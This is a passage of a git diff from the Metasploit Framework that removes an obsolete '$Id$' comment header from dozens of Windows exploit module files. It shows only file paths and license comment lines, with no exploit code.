Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb index ee90369c0a..67c2caed14 100644 --- a/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb +++ b/modules/exploits/windows/misc/ibm_tsm_cad_ping.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb index f93bf8da85..385a94d3de 100644 --- a/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb +++ b/modules/exploits/windows/misc/ibm_tsm_rca_dicugetidentify.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/landesk_aolnsrvr.rb b/modules/exploits/windows/misc/landesk_aolnsrvr.rb index 1f47e3d594..467a6b9931 100644 --- a/modules/exploits/windows/misc/landesk_aolnsrvr.rb +++ b/modules/exploits/windows/misc/landesk_aolnsrvr.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/mercury_phonebook.rb b/modules/exploits/windows/misc/mercury_phonebook.rb index 6c8c6c6513..2ec86746dd 100644 --- a/modules/exploits/windows/misc/mercury_phonebook.rb +++ b/modules/exploits/windows/misc/mercury_phonebook.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/mini_stream.rb b/modules/exploits/windows/misc/mini_stream.rb index 5c33df8ac0..d01f0a23b5 100644 --- a/modules/exploits/windows/misc/mini_stream.rb +++ b/modules/exploits/windows/misc/mini_stream.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index c9f8a72391..bc98fe2d09 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/ms07_064_sami.rb b/modules/exploits/windows/misc/ms07_064_sami.rb index 6495b2cf15..7ef0252fa7 100644 --- a/modules/exploits/windows/misc/ms07_064_sami.rb +++ b/modules/exploits/windows/misc/ms07_064_sami.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb index c24e4fa002..c88878b756 100644 --- a/modules/exploits/windows/misc/netcat110_nt.rb +++ b/modules/exploits/windows/misc/netcat110_nt.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/nettransport.rb b/modules/exploits/windows/misc/nettransport.rb index 905db40381..a3a4f8635b 100644 --- a/modules/exploits/windows/misc/nettransport.rb +++ b/modules/exploits/windows/misc/nettransport.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/poppeeper_date.rb b/modules/exploits/windows/misc/poppeeper_date.rb index 79ed43083c..b5d82230d5 100644 --- a/modules/exploits/windows/misc/poppeeper_date.rb +++ b/modules/exploits/windows/misc/poppeeper_date.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/poppeeper_uidl.rb b/modules/exploits/windows/misc/poppeeper_uidl.rb index 1df5c56d1c..d08ecae39e 100644 --- a/modules/exploits/windows/misc/poppeeper_uidl.rb +++ b/modules/exploits/windows/misc/poppeeper_uidl.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/pxexploit.rb b/modules/exploits/windows/misc/pxexploit.rb index 7c952e178e..1797f39d12 100644 --- a/modules/exploits/windows/misc/pxexploit.rb +++ b/modules/exploits/windows/misc/pxexploit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/realtek_playlist.rb b/modules/exploits/windows/misc/realtek_playlist.rb index 3a59b086bc..e00a85817c 100644 --- a/modules/exploits/windows/misc/realtek_playlist.rb +++ b/modules/exploits/windows/misc/realtek_playlist.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb index 3e180ad102..6d02ab4e2f 100644 --- a/modules/exploits/windows/misc/sap_2005_license.rb +++ b/modules/exploits/windows/misc/sap_2005_license.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/shixxnote_font.rb b/modules/exploits/windows/misc/shixxnote_font.rb index 9bc501672e..25f99d2d8d 100644 --- a/modules/exploits/windows/misc/shixxnote_font.rb +++ b/modules/exploits/windows/misc/shixxnote_font.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/splayer_content_type.rb b/modules/exploits/windows/misc/splayer_content_type.rb index 7db10b2377..58eb9ce20f 100644 --- a/modules/exploits/windows/misc/splayer_content_type.rb +++ b/modules/exploits/windows/misc/splayer_content_type.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/talkative_response.rb b/modules/exploits/windows/misc/talkative_response.rb index 6779dbded2..325c86dfe3 100644 --- a/modules/exploits/windows/misc/talkative_response.rb +++ b/modules/exploits/windows/misc/talkative_response.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/tiny_identd_overflow.rb b/modules/exploits/windows/misc/tiny_identd_overflow.rb index d875ec8754..4e71100367 100644 --- a/modules/exploits/windows/misc/tiny_identd_overflow.rb +++ b/modules/exploits/windows/misc/tiny_identd_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/ufo_ai.rb b/modules/exploits/windows/misc/ufo_ai.rb index 404db5e45e..130a2616c9 100644 --- a/modules/exploits/windows/misc/ufo_ai.rb +++ b/modules/exploits/windows/misc/ufo_ai.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/windows_rsh.rb b/modules/exploits/windows/misc/windows_rsh.rb index 99b9a4d149..0ebd92c7ac 100644 --- a/modules/exploits/windows/misc/windows_rsh.rb +++ b/modules/exploits/windows/misc/windows_rsh.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/misc/wireshark_packet_dect.rb b/modules/exploits/windows/misc/wireshark_packet_dect.rb index 0b35e5b1ef..c86e1665ec 100644 --- a/modules/exploits/windows/misc/wireshark_packet_dect.rb +++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb index 332719052b..da1b1e8def 100644 --- a/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb +++ b/modules/exploits/windows/mmsp/ms10_025_wmss_connect_funnel.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/motorola/timbuktu_fileupload.rb b/modules/exploits/windows/motorola/timbuktu_fileupload.rb index 9dd588227a..fe9ee50921 100644 --- a/modules/exploits/windows/motorola/timbuktu_fileupload.rb +++ b/modules/exploits/windows/motorola/timbuktu_fileupload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb index 7691a44c61..80fac095fc 100644 --- a/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb +++ b/modules/exploits/windows/mssql/lyris_listmanager_weak_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/mssql/ms02_039_slammer.rb b/modules/exploits/windows/mssql/ms02_039_slammer.rb index d9367312e0..19e2f5c7b1 100644 --- a/modules/exploits/windows/mssql/ms02_039_slammer.rb +++ b/modules/exploits/windows/mssql/ms02_039_slammer.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/mssql/ms02_056_hello.rb b/modules/exploits/windows/mssql/ms02_056_hello.rb index 12c92933eb..4c2f0253cc 100644 --- a/modules/exploits/windows/mssql/ms02_056_hello.rb +++ b/modules/exploits/windows/mssql/ms02_056_hello.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb index e9b25ababe..baa3f28207 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb index 4ee4950ae1..223b1c73b8 100644 --- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb +++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/mssql/mssql_payload.rb b/modules/exploits/windows/mssql/mssql_payload.rb index b302b76f5a..e34019b4c7 100644 --- a/modules/exploits/windows/mssql/mssql_payload.rb +++ b/modules/exploits/windows/mssql/mssql_payload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/mssql/mssql_payload_sqli.rb b/modules/exploits/windows/mssql/mssql_payload_sqli.rb index 3d3f4cb6f1..aab3dc9205 100644 --- a/modules/exploits/windows/mssql/mssql_payload_sqli.rb +++ b/modules/exploits/windows/mssql/mssql_payload_sqli.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/mysql/mysql_payload.rb b/modules/exploits/windows/mysql/mysql_payload.rb index 3cb74886ac..f18133f638 100644 --- a/modules/exploits/windows/mysql/mysql_payload.rb +++ b/modules/exploits/windows/mysql/mysql_payload.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/mysql/mysql_yassl_hello.rb b/modules/exploits/windows/mysql/mysql_yassl_hello.rb index f0f5c7b4ff..ce626ef0f8 100644 --- a/modules/exploits/windows/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/windows/mysql/mysql_yassl_hello.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/nfs/xlink_nfsd.rb b/modules/exploits/windows/nfs/xlink_nfsd.rb index c1b509eba4..b381daa5c4 100644 --- a/modules/exploits/windows/nfs/xlink_nfsd.rb +++ b/modules/exploits/windows/nfs/xlink_nfsd.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/nntp/ms05_030_nntp.rb b/modules/exploits/windows/nntp/ms05_030_nntp.rb index 71abe29239..929970a0ee 100644 --- a/modules/exploits/windows/nntp/ms05_030_nntp.rb +++ b/modules/exploits/windows/nntp/ms05_030_nntp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/novell/groupwisemessenger_client.rb b/modules/exploits/windows/novell/groupwisemessenger_client.rb index 48162aec8c..0dea84bbaa 100644 --- a/modules/exploits/windows/novell/groupwisemessenger_client.rb +++ b/modules/exploits/windows/novell/groupwisemessenger_client.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/novell/nmap_stor.rb b/modules/exploits/windows/novell/nmap_stor.rb index 4b2f4c35cd..03d4fe401c 100644 --- a/modules/exploits/windows/novell/nmap_stor.rb +++ b/modules/exploits/windows/novell/nmap_stor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/novell/zenworks_desktop_agent.rb b/modules/exploits/windows/novell/zenworks_desktop_agent.rb index f9c6915ad8..8550cf6dd5 100644 --- a/modules/exploits/windows/novell/zenworks_desktop_agent.rb +++ b/modules/exploits/windows/novell/zenworks_desktop_agent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/oracle/osb_ndmp_auth.rb b/modules/exploits/windows/oracle/osb_ndmp_auth.rb index 364c1e7c21..7760d28e2a 100644 --- a/modules/exploits/windows/oracle/osb_ndmp_auth.rb +++ b/modules/exploits/windows/oracle/osb_ndmp_auth.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/oracle/tns_arguments.rb b/modules/exploits/windows/oracle/tns_arguments.rb index f35daf337c..465fd91570 100644 --- a/modules/exploits/windows/oracle/tns_arguments.rb +++ b/modules/exploits/windows/oracle/tns_arguments.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/oracle/tns_auth_sesskey.rb b/modules/exploits/windows/oracle/tns_auth_sesskey.rb index 8cd9ef66a7..b3688d22df 100644 --- a/modules/exploits/windows/oracle/tns_auth_sesskey.rb +++ b/modules/exploits/windows/oracle/tns_auth_sesskey.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/oracle/tns_service_name.rb b/modules/exploits/windows/oracle/tns_service_name.rb index 2d8049714d..a660bd0019 100644 --- a/modules/exploits/windows/oracle/tns_service_name.rb +++ b/modules/exploits/windows/oracle/tns_service_name.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/pop3/seattlelab_pass.rb b/modules/exploits/windows/pop3/seattlelab_pass.rb index bcefab085e..28d8c046ff 100644 --- a/modules/exploits/windows/pop3/seattlelab_pass.rb +++ b/modules/exploits/windows/pop3/seattlelab_pass.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb index a399992e0c..cc2e5df06d 100644 --- a/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb +++ b/modules/exploits/windows/proxy/bluecoat_winproxy_host.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index 7977fa9a92..bc7f857203 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/proxy/proxypro_http_get.rb b/modules/exploits/windows/proxy/proxypro_http_get.rb index e9a0331884..43883e288b 100644 --- a/modules/exploits/windows/proxy/proxypro_http_get.rb +++ b/modules/exploits/windows/proxy/proxypro_http_get.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index a1e99a62dd..82bce6bb03 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/citect_scada_odbc.rb b/modules/exploits/windows/scada/citect_scada_odbc.rb index a1324f3637..9050a367c7 100644 --- a/modules/exploits/windows/scada/citect_scada_odbc.rb +++ b/modules/exploits/windows/scada/citect_scada_odbc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/daq_factory_bof.rb b/modules/exploits/windows/scada/daq_factory_bof.rb index 70e6d57577..ee49a59726 100644 --- a/modules/exploits/windows/scada/daq_factory_bof.rb +++ b/modules/exploits/windows/scada/daq_factory_bof.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/factorylink_csservice.rb b/modules/exploits/windows/scada/factorylink_csservice.rb index 5ff6e32fb8..c059a5a08d 100644 --- a/modules/exploits/windows/scada/factorylink_csservice.rb +++ b/modules/exploits/windows/scada/factorylink_csservice.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb index b2602936a7..92d635d2f9 100644 --- a/modules/exploits/windows/scada/factorylink_vrn_09.rb +++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/iconics_genbroker.rb b/modules/exploits/windows/scada/iconics_genbroker.rb index 2baa05aea6..ea951b57e8 100644 --- a/modules/exploits/windows/scada/iconics_genbroker.rb +++ b/modules/exploits/windows/scada/iconics_genbroker.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb index d7617ebfda..a42fffb49a 100644 --- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb +++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb index 847ad290a8..8837901b0b 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_listall.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb index 0e4d93f4a8..93506879a6 100644 --- a/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb +++ b/modules/exploits/windows/scada/igss9_igssdataserver_rename.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/igss9_misc.rb b/modules/exploits/windows/scada/igss9_misc.rb index ebbbc4fa69..e921f8e713 100644 --- a/modules/exploits/windows/scada/igss9_misc.rb +++ b/modules/exploits/windows/scada/igss9_misc.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/moxa_mdmtool.rb b/modules/exploits/windows/scada/moxa_mdmtool.rb index 9c0f54a7b8..caffad8826 100644 --- a/modules/exploits/windows/scada/moxa_mdmtool.rb +++ b/modules/exploits/windows/scada/moxa_mdmtool.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/procyon_core_server.rb b/modules/exploits/windows/scada/procyon_core_server.rb index df6b4ef591..606b9d2366 100644 --- a/modules/exploits/windows/scada/procyon_core_server.rb +++ b/modules/exploits/windows/scada/procyon_core_server.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/realwin.rb b/modules/exploits/windows/scada/realwin.rb index 962bc9adfd..852e80d824 100644 --- a/modules/exploits/windows/scada/realwin.rb +++ b/modules/exploits/windows/scada/realwin.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb index da6a37553c..66c1848158 100644 --- a/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb +++ b/modules/exploits/windows/scada/realwin_on_fc_binfile_a.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/realwin_on_fcs_login.rb b/modules/exploits/windows/scada/realwin_on_fcs_login.rb index 7408b473f3..feb1fa8a4f 100644 --- a/modules/exploits/windows/scada/realwin_on_fcs_login.rb +++ b/modules/exploits/windows/scada/realwin_on_fcs_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize.rb b/modules/exploits/windows/scada/realwin_scpc_initialize.rb index 12edbea38f..d9268f72f2 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb index 50b6bf3540..d1f6228a7a 100644 --- a/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb +++ b/modules/exploits/windows/scada/realwin_scpc_initialize_rf.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb index c3a328efa0..9ab3f85a3d 100644 --- a/modules/exploits/windows/scada/realwin_scpc_txtevent.rb +++ b/modules/exploits/windows/scada/realwin_scpc_txtevent.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/scadapro_cmdexe.rb b/modules/exploits/windows/scada/scadapro_cmdexe.rb index 92ea664d25..06027407e5 100644 --- a/modules/exploits/windows/scada/scadapro_cmdexe.rb +++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/scada/winlog_runtime.rb b/modules/exploits/windows/scada/winlog_runtime.rb index bd0ef0aae4..a7e87ff683 100644 --- a/modules/exploits/windows/scada/winlog_runtime.rb +++ b/modules/exploits/windows/scada/winlog_runtime.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/sip/aim_triton_cseq.rb b/modules/exploits/windows/sip/aim_triton_cseq.rb index 0a999ea10f..8d4c7e4b3d 100644 --- a/modules/exploits/windows/sip/aim_triton_cseq.rb +++ b/modules/exploits/windows/sip/aim_triton_cseq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/sip/sipxezphone_cseq.rb b/modules/exploits/windows/sip/sipxezphone_cseq.rb index 047efe2110..1641d8f701 100644 --- a/modules/exploits/windows/sip/sipxezphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxezphone_cseq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/sip/sipxphone_cseq.rb b/modules/exploits/windows/sip/sipxphone_cseq.rb index 1bf478612a..2e11c728b0 100644 --- a/modules/exploits/windows/sip/sipxphone_cseq.rb +++ b/modules/exploits/windows/sip/sipxphone_cseq.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms03_049_netapi.rb b/modules/exploits/windows/smb/ms03_049_netapi.rb index 0e70b92b8f..e856dbb89f 100644 --- a/modules/exploits/windows/smb/ms03_049_netapi.rb +++ b/modules/exploits/windows/smb/ms03_049_netapi.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/exploits/windows/smb/ms04_007_killbill.rb b/modules/exploits/windows/smb/ms04_007_killbill.rb index 433b07133b..d88c1c8096 100644 --- a/modules/exploits/windows/smb/ms04_007_killbill.rb +++ b/modules/exploits/windows/smb/ms04_007_killbill.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This 